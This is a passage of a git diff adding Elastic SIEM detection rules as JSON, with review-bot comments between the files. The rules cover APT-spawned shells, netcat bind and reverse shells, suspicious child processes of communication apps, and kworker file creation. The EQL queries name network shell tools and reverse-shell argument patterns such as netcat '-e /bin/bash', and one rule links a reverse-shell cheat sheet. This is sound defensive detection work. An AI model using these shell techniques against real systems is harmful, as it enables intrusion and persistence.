@@ -0,0 +1,139 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects suspicious process events executed by the APT package manager, potentially indicating persistence through an APT backdoor. In Linux, APT (Advanced Package Tool) is a command-line utility used for handling packages on Debian-based systems, providing functions for installing, updating, upgrading, and removing software along with managing package repositories. Attackers can backdoor APT to gain persistence by injecting malicious code into scripts that APT runs, thereby ensuring continued unauthorized access or control each time APT is used for package management.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious APT Package Manager Execution", + "query": "sequence by host.id with maxspan=5s\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and\n process.parent.name == \"apt\" and process.args == \"-c\" and process.name in (\n \"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\"\n )\n ] by process.entity_id\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and process.name : (\n \"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\", \"python*\", \"php*\",\n \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\"\n )\n ] by process.parent.entity_id\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + 
"ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ad959eeb-2b7b-4722-ba08-a45f6622f005", + "setup": "## Setup\n\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/" + }, + { + "id": "T1574", + "name": "Hijack Execution Flow", + "reference": "https://attack.mitre.org/techniques/T1574/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [] + } + ], + "type": "eql", + "version": 2 + }, + "id": "ad959eeb-2b7b-4722-ba08-a45f6622f005_2", + "type": 
"security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/adb961e0-cb74-42a0-af9e-29fc41f88f5f_110.json b/packages/security_detection_engine/kibana/security_rule/adb961e0-cb74-42a0-af9e-29fc41f88f5f_110.json new file mode 100644 index 00000000000..ffca0702e23 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/adb961e0-cb74-42a0-af9e-29fc41f88f5f_110.json 
@@ -0,0 +1,102 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "A netcat process is engaging in network activity on a Linux host. Netcat is often used as a persistence mechanism by exporting a reverse shell or by serving a shell on a listening port. Netcat is also sometimes used for data exfiltration.", + "false_positives": [ + "Netcat is a dual-use tool that can be used for benign or malicious activity. Netcat is included in some Linux distributions so its presence is not necessarily suspicious. Some normal use of this program, while uncommon, may originate from scripts, automation tools, and frameworks." + ], + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "File Transfer or Listener Established via Netcat", + "note": "## Triage and analysis\n\n### Investigating Netcat Network Activity\n\nNetcat is a dual-use command line tool that can be used for various purposes, such as port scanning, file transfers, and connection tests. Attackers can abuse its functionality for malicious purposes such creating bind shells or reverse shells to gain access to the target system.\n\nA reverse shell is a mechanism that's abused to connect back to an attacker-controlled system. It effectively redirects the system's input and output and delivers a fully functional remote shell to the attacker. 
Even private systems are vulnerable since the connection is outgoing.\n\nA bind shell is a type of backdoor that attackers set up on the target host and binds to a specific port to listen for an incoming connection from the attacker.\n\nThis rule identifies potential reverse shell or bind shell activity using Netcat by checking for the execution of Netcat followed by a network connection.\n\n#### Possible investigation steps\n\n- Examine the command line to identify if the command is suspicious.\n- Extract and examine the target domain or IP address.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - Scope other potentially compromised hosts in your environment by mapping hosts that also communicated with the domain or IP address.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n- Investigate any abnormal behavior by the subject process such as network connections, file modifications, and any spawned child processes.\n\n### False positive analysis\n\n- Netcat is a dual-use tool that can be used for benign or malicious activity. It is included in some Linux distributions, so its presence is not necessarily suspicious. Some normal use of this program, while uncommon, may originate from scripts, automation tools, and frameworks.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Block the identified indicators of compromise (IoCs).\n- Take actions to terminate processes and connections used by the attacker.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by process.entity_id\n [process where host.os.type == \"linux\" and event.type == \"start\" and\n process.name:(\"nc\",\"ncat\",\"netcat\",\"netcat.openbsd\",\"netcat.traditional\") and (\n /* bind shell to echo for command execution */\n (process.args:(\"-l\",\"-p\") and process.args:(\"-c\",\"echo\",\"$*\"))\n /* bind shell to specific port */\n or process.args:(\"-l\",\"-p\",\"-lp\")\n /* reverse shell to command-line interpreter used for command execution */\n or (process.args:(\"-e\") and process.args:(\"/bin/bash\",\"/bin/sh\"))\n /* file transfer via stdout */\n or process.args:(\">\",\"<\")\n /* file transfer via pipe */\n or (process.args:(\"|\") and process.args:(\"nc\",\"ncat\"))\n )]\n [network where host.os.type == \"linux\" and (process.name == \"nc\" or process.name == \"ncat\" or process.name == \"netcat\" or\n process.name == \"netcat.openbsd\" or process.name == \"netcat.traditional\")]\n", + "references": [ + "http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", + "https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf", + "https://en.wikipedia.org/wiki/Netcat", + "https://www.hackers-arise.com/hacking-fundamentals", + "https://null-byte.wonderhowto.com/how-to/hack-like-pro-use-netcat-swiss-army-knife-hacking-tools-0148657/", 
+ "https://levelup.gitconnected.com/ethical-hacking-part-15-netcat-nc-and-netcat-f6a8f7df43fd" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "adb961e0-cb74-42a0-af9e-29fc41f88f5f", + "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. 
[Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 110 + }, + "id": "adb961e0-cb74-42a0-af9e-29fc41f88f5f_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/adbfa3ee-777e-4747-b6b0-7bd645f30880_3.json b/packages/security_detection_engine/kibana/security_rule/adbfa3ee-777e-4747-b6b0-7bd645f30880_3.json new file mode 100644 index 00000000000..0ab930c7c17 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/adbfa3ee-777e-4747-b6b0-7bd645f30880_3.json 
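Review bot: The "file transfer via stdout" and "file transfer via pipe" branches of the first sequence step test `process.args:(">","<")` and `process.args:("|")`, but those operators are presumably consumed by the invoking shell and never reach netcat's own argv, so these two clauses are unlikely to fire on their own and the listener (`-l`/`-p`/`-lp`) and `-e` clauses effectively carry the detection. This should be confirmed against sample telemetry before relying on the rule for transfer detection; if the clauses are retained for the rare case where the operators are passed literally, a comment in the query such as `/* only matches when redirection/pipe tokens are passed literally as arguments */` would document the limitation for the next maintainer.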
@@ -0,0 +1,136 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies suspicious child processes of communications apps, which can indicate a potential masquerading as the communication app or the exploitation of a vulnerability on the application causing it to execute code.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Communication App Child Process", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (\n /* Slack */\n (process.parent.name : \"slack.exe\" and not\n (\n (\n process.executable : (\n \"?:\\\\Program Files\\\\*\",\n \"?:\\\\Program Files (x86)\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Island\\\\Island\\\\Application\\\\Island.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Zoom\\\\bin*\\\\Zoom.exe\",\n \"?:\\\\Windows\\\\System32\\\\rundll32.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Mozilla Firefox\\\\firefox.exe\",\n \"?:\\\\Windows\\\\System32\\\\notepad.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\"\n ) and process.code_signature.trusted == true \n ) or\n (\n process.code_signature.subject_name : (\n \"Slack Technologies, Inc.\",\n \"Slack Technologies, LLC\"\n ) and process.code_signature.trusted == true\n ) or\n (\n (process.name : \"powershell.exe\" and process.command_line : \"powershell.exe -c Invoke-WebRequest -Uri https://slackb.com/*\") or\n (process.name : \"cmd.exe\" and process.command_line : \"C:\\\\WINDOWS\\\\system32\\\\cmd.exe /d /s /c \\\"%windir%\\\\System32\\\\rundll32.exe User32.dll,SetFocus 0\\\"\")\n )\n )\n ) or\n\n /* WebEx */\n (process.parent.name : (\"CiscoCollabHost.exe\", \"WebexHost.exe\") and not\n (\n (\n process.executable : (\n \"?:\\\\Program 
Files\\\\*\",\n \"?:\\\\Program Files (x86)\\\\*\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\"\n ) and process.code_signature.trusted == true \n ) or\n (\n process.code_signature.subject_name : (\n \"Cisco Systems, Inc.\",\n \"Cisco WebEx LLC\",\n \"Cisco Systems Inc.\"\n ) and process.code_signature.trusted == true\n )\n )\n ) or\n\n /* Teams */\n (process.parent.name : \"Teams.exe\" and not\n (\n (\n process.executable : (\n \"?:\\\\Program Files\\\\*\",\n \"?:\\\\Program Files (x86)\\\\*\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\BrowserCore\\\\BrowserCore.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Mozilla Firefox\\\\firefox.exe\"\n ) and process.code_signature.trusted == true \n ) or\n (\n process.code_signature.subject_name : (\n \"Microsoft Corporation\",\n \"Microsoft 3rd Party Application Component\"\n ) and process.code_signature.trusted == true\n ) or\n (\n (process.name : \"taskkill.exe\" and process.args : \"Teams.exe\")\n )\n )\n ) or\n\n /* Discord */\n (process.parent.name : \"Discord.exe\" and not\n (\n (\n process.executable : (\n \"?:\\\\Program Files\\\\*\",\n \"?:\\\\Program Files (x86)\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Windows\\\\System32\\\\reg.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\reg.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\"\n ) and process.code_signature.trusted == true \n ) or\n (\n process.code_signature.subject_name : (\n \"Discord Inc.\"\n ) and process.code_signature.trusted == true\n ) or\n (\n process.name : \"cmd.exe\" and \n (\n process.command_line : (\n \"C:\\\\WINDOWS\\\\system32\\\\cmd.exe /d /s /c \\\"chcp\\\"\",\n \"C:\\\\WINDOWS\\\\system32\\\\cmd.exe /q /d /s /c \\\"C:\\\\Program^ Files\\\\NVIDIA^ 
Corporation\\\\NVSMI\\\\nvidia-smi.exe\\\"\"\n ) or\n process.args : (\n \"C:\\\\WINDOWS/System32/nvidia-smi.exe\",\n \"C:\\\\WINDOWS\\\\System32\\\\nvidia-smi.exe\"\n )\n )\n )\n )\n ) or\n\n /* WhatsApp */\n (process.parent.name : \"Whatsapp.exe\" and not\n (\n (\n process.executable : (\n \"?:\\\\Program Files\\\\*\",\n \"?:\\\\Program Files (x86)\\\\*\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\reg.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\reg.exe\"\n ) and process.code_signature.trusted == true \n ) or\n (\n process.code_signature.subject_name : (\n \"WhatsApp LLC\",\n \"WhatsApp, Inc\",\n \"24803D75-212C-471A-BC57-9EF86AB91435\"\n ) and process.code_signature.trusted == true\n ) or\n (\n (process.name : \"cmd.exe\" and process.command_line : \"C:\\\\Windows\\\\system32\\\\cmd.exe /d /s /c \\\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmic.exe*\")\n )\n )\n ) or\n\n /* Zoom */\n (process.parent.name : \"Zoom.exe\" and not\n (\n (\n process.executable : (\n \"?:\\\\Program Files\\\\*\",\n \"?:\\\\Program Files (x86)\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Island\\\\Island\\\\Application\\\\Island.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Mozilla Firefox\\\\firefox.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\"\n ) and process.code_signature.trusted == true \n ) or\n (\n process.code_signature.subject_name : (\n \"Zoom Video Communications, Inc.\"\n ) and process.code_signature.trusted == true\n )\n )\n ) or\n\n /* Outlook */\n (process.parent.name : \"outlook.exe\" and not\n (\n (\n process.executable : (\n \"?:\\\\Program Files\\\\*\",\n \"?:\\\\Program Files (x86)\\\\*\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\system32\\\\wermgr.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe\",\n 
\"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\NewOutlookInstall\\\\NewOutlookInstaller.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Island\\\\Island\\\\Application\\\\Island.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Mozilla Firefox\\\\firefox.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Zoom\\\\bin\\\\Zoom.exe\",\n \"?:\\\\Windows\\\\System32\\\\IME\\\\SHARED\\\\IMEWDBLD.EXE\",\n \"?:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\*\",\n \"?:\\\\Windows\\\\System32\\\\prevhost.exe\",\n \"?:\\\\Windows\\\\System32\\\\dwwin.exe\",\n \"?:\\\\Windows\\\\System32\\\\mspaint.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\mspaint.exe\",\n \"?:\\\\Windows\\\\System32\\\\notepad.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\notepad.exe\",\n \"?:\\\\Windows\\\\System32\\\\smartscreen.exe\",\n \"?:\\\\Windows\\\\explorer.exe\",\n \"?:\\\\Windows\\\\splwow64.exe\"\n ) and process.code_signature.trusted == true \n )\n )\n ) or\n\n /* Thunderbird */\n (process.parent.name : \"thunderbird.exe\" and not\n (\n (\n process.executable : (\n \"?:\\\\Program Files\\\\*\",\n \"?:\\\\Program Files (x86)\\\\*\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\splwow64.exe\"\n ) and process.code_signature.trusted == true \n ) or\n (\n process.code_signature.subject_name : (\n \"Mozilla Corporation\"\n ) and process.code_signature.trusted == true\n )\n )\n )\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + 
{ + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "adbfa3ee-777e-4747-b6b0-7bd645f30880", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Persistence", + "Rule Type: BBR", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.001", + "name": "Invalid Code Signature", + "reference": "https://attack.mitre.org/techniques/T1036/001/" + }, + { + "id": "T1036.005", + "name": "Match Legitimate Name or Location", + "reference": "https://attack.mitre.org/techniques/T1036/005/" + } + ] + }, + { + "id": "T1055", + "name": "Process Injection", + "reference": "https://attack.mitre.org/techniques/T1055/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1554", + "name": "Compromise Client Software Binary", + "reference": "https://attack.mitre.org/techniques/T1554/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "adbfa3ee-777e-4747-b6b0-7bd645f30880_3", + "type": "security-rule" +} \ No newline at end of file 
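Review bot: The Outlook exclusion list allowlists `?:\\Users\\*\\AppData\\Local\\Temp\\NewOutlookInstall\\NewOutlookInstaller.exe` on `process.code_signature.trusted == true` alone, whereas the Slack, WebEx, Teams, Discord, WhatsApp and Zoom branches additionally pin `process.code_signature.subject_name`; for an entry under a user-writable Temp directory, trust alone means any validly signed binary at that path is silently excluded. Suggest gating that path (and the other per-user `AppData` entries in the Outlook branch) with `and process.code_signature.subject_name : "Microsoft Corporation"` or the publisher the installer actually carries, consistent with how the other branches are written. Minor style point: several `process.code_signature.trusted == true ` occurrences in the query carry trailing whitespace before the newline, which is harmless but will show up as noise in future diffs.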
diff --git a/packages/security_detection_engine/kibana/security_rule/ae343298-97bc-47bc-9ea2-5f2ad831c16e_3.json b/packages/security_detection_engine/kibana/security_rule/ae343298-97bc-47bc-9ea2-5f2ad831c16e_3.json new file mode 100644 index 00000000000..fe0c05ad9e6 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ae343298-97bc-47bc-9ea2-5f2ad831c16e_3.json 
@@ -0,0 +1,89 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for a file creation event originating from a kworker parent process. kworker, or kernel worker, processes are part of the kernel's workqueue mechanism. They are responsible for executing work that has been scheduled to be done in kernel space, which might include tasks like handling interrupts, background activities, and other kernel-related tasks. Attackers may attempt to evade detection by masquerading as a kernel worker process.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious File Creation via Kworker", + "note": "## Triage and analysis\n\n### Investigating Suspicious File Creation via Kworker\n\nKworker, or kernel worker, processes are part of the kernel's workqueue mechanism. They are responsible for executing work that has been scheduled to be done in kernel space, which might include tasks like handling interrupts, background activities, and other kernel-related tasks.\n\nAttackers may attempt to evade detection by masquerading as a kernel worker process.\n\nThis rule monitors for suspicious file creation events through the kworker process. This is not common, and could indicate malicious behaviour.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified through OSQuery.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE path = {{file.path}}\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. 
\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n- Investigate abnormal behaviors by the subject process/user such as network connections, file modifications, and any other spawned child processes.\n - Investigate listening ports and open sockets to look for potential command and control traffic or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n - Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = 